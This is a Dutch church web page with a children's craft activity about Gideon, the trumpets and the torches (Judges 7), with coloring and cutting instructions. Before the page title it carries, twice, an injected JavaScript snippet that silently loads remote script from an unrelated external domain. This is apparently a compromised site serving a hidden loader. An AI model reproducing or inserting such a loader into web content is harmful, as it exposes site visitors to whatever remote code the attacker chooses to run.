;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerk School en Gezin, Gideon, ramshoorn en fakkel - PKN Damwâld

Kerk School en Gezin, Gideon, ramshoorn en fakkel

Gepubliceerd op: vrijdag 15 januari 2021

Deze week staat het verhaal van Gideon centraal.
Gideon die met een groot leger de vijand wil verslaan, maar uiteindelijk met een klein leger van de Israëlieten de Midianieten gaat verslaan in opdracht van God.

Het verhaal is te vinden in Richteren 7.

Het is nacht… De vijand slaapt.
Elke soldaat heeft een bazuin.
En een kruik met een fakkel.
Gideon blaast op de bazuin.
Zijn soldaten roepen:
‘Voor de Heere en voor Gideon.’
Nu blazen ze allemaal op de bazuin.
De kruiken slaan ze kapot.
Wat worden de vijanden bang!
Ze vluchten het land uit. 

Bij deze knutsel  is een basisplaat gemaakt met daarop Gideon en wat scherven op de grond en een 2e blad met daarop kruikdelen, een arm en een fakkel. Op blad 3 en 4 staan de kleurplaatversies.

Kleur de basisplaat in, kleur ook de losse onderdelen op blad 2 in.
Knip de arm, de fakkel en de kruikdelen uit.
Vouw de plakstroken naar achteren. De kruikdelen kunnen beneden op de grond geplakt worden.

De arm is een beetje moeilijker. Je kunt kiezen met een splitpen en bewegend, of vastlijmen.

De fakkel heeft plakstroken voor de stevigheid. Vouw de plakstroken naar achteren en lijm ze over elkaar heen.
De fakkel kan omgekeerd (dus op de kop) in de kruik staan en kan ook geschoven worden in de hand van Gideon.

Op de foto zie je hoe je dit kunt maken.

Met onderstaande link kun je het knutselwerkje downloaden en uitprinten.

Veel plezier.

Gideon knutselwerkje